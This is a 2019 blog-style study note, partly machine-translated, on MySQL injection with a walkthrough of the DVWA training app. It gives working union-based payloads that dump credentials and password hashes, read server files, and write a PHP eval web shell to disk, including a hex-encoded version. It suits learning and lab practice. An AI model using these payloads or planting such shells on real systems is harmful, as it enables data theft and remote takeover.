Date: 2019-07-23 19:55:59
update:
Author: Bay0net
Description: Mysql injection notes
0x01, basic information
Basic terms
- Database: The database is a collection of related tables.
- Data: Table are matrix data. In a database table it looks like a simple spreadsheet.
- Column: one (data element) contain the same type of data, such as a zip code.
- Rows: one (= tuple or record) is a group of related data, such as a user subscription data.
- Primary key: Primary key is unique. A data table can contain only one primary key. You can use the primary key to query the data.
- Foreign Key: foreign key for associating the two tables. 
Common Commands
# 登录
mysql -h 127.0.0.1 -u root -p root
0x02, Mysql command
Explosion database name, table names, field names
In each MySQL
instance has a separate information_schema
, used to store MySQL
all of the basic information of other database instances.
# 爆数据库的名称
select group_concat(SCHEMA_NAME) from information_schema.schemata;
# 爆当前数据库的表名
select group_concat(table_name) from information_schema.tables where table_schema=database();
# 爆字段名(表名是 users,加引号或十六进制编码)
select group_concat(column_name) from information_schema.columns where table_name='users';
select group_concat(column_name) from information_schema.columns where table_name=0x7573657273;
# 爆字段内容
select first_name,password from users
View MySQL read and write permissions
Use mysql
of the read and write functions need to have certain privileges.
secure_file_priv
Parameters used to restrict load_file,into outfile
other related functions to perform the role of literacy in which the specified directory.
# 查看方式
show global variables like '%secure%';
# 具体意义
当 secure_file_priv 的值为 null ,表示限制 mysqld 不允许导入|导出
当 secure_file_priv 的值为/tmp/ ,表示限制 mysqld 的导入|导出只能发生在/tmp/目录下
当 secure_file_priv 的值为/,表示限制 mysqld 的导入|导出的目录为所在的整个磁盘
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制
File Operations
# 读取文件
select load_file('//tmp//key');
# 写入文件(需要有权限、知道绝对路径)
select 'hello' into outfile '/tmp/test01'
Filter function
PHP < 5.4
Time; there is a magic_quotes_gpc
configuration item, when magic_quotes is on
all 单引号、双引号、反斜杠和 null
are automatically escaped with a backslash. In php5.4
later versions you can not use this method to escape.
mysql_real_escape_string()
, It is also used to escape special characters, but this extension php5.5
has been deprecated in, and php7
deletion.
PHP: mysqli::real_escape_string - Manual
0x03、SQL Injection(DVWA)
Low Security Level
# 判断是否为注入
?id=1' or '1'='1
?id=1' or '1'='2
# 判断字段长度(2 正常,3 异常)
?id=1' order by 2 --
?id=1' order by 3 --
# 确定回显点
?id=1' union select 111,222 --
# 用户名和数据库名称
?id=1' union select user(),database() --
-- output:admin@localhost、dvwa
# 查看当前用户和 mysql 版本
?id=1' union select current_user(),version() --
-- output:First name: admin@%、 5.5.47-0ubuntu0.14.04.1
# 爆表名
?id=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema =database() --
-- output:guestbook,users
# 爆列名(两种办法,加引号或者十六进制编码)
?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name =0x7573657273 --
?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' --
-- output:user_id,first_name,last_name,user,password,avatar,last_login,failed_login
# 爆字段名
?id=1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users --
?id=1' union select null,concat_ws(char(32,58,32),user,password) from users --
?id=1' union select user,password from users --
-- output:admin/5f4dcc3b5aa765d61d8327deb882cf99
# 读文件
?id=1' union select 1,load_file('//tmp//key') --
# 写文件()
?id=1' and '1'='2' union select null,'hello' into outfile '/tmp/test01' --
?id=999' union select null,'hello' into outfile '/tmp/test02' --
?id=999' union select null,'<?php @eval($_POST["gg"]); ?>' into outfile '/tmp/test03' --
?id=999' union select 1,0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E into outfile '//tmp//test04' --
Medium Security Level
Use a mysqli_real_escape_string
function to escape special characters, while the front page set up drop-down selection form, hoping to control the user's input.
Here is a digital-type implant, so little relationship between the filter and special symbols, using the hackbar
conduct POST
can be.
# 判断注入点
id=1 and 1=1 &Submit=Submit
id=1 and 1=2 &Submit=Submit
# 爆数据
id=1 union select user,password from users&Submit=Submit
High Secuirty Level
Here added a limit 1
limiting output, but may be directly commented, solution and Low Security Level
the same.
Impossible Secuity Level
Using PDO
technology to draw a line of code and data, effectively prevent SQL injection, while the number of query results returned only for the moment, will succeed output, thus effectively prevent the "Tuoku" Anti-CSRFtoken
mechanism added to further improve the safety.
DVWA SQL Injection clearance Tutorials | AnCoLin's Blog | wind shadow blog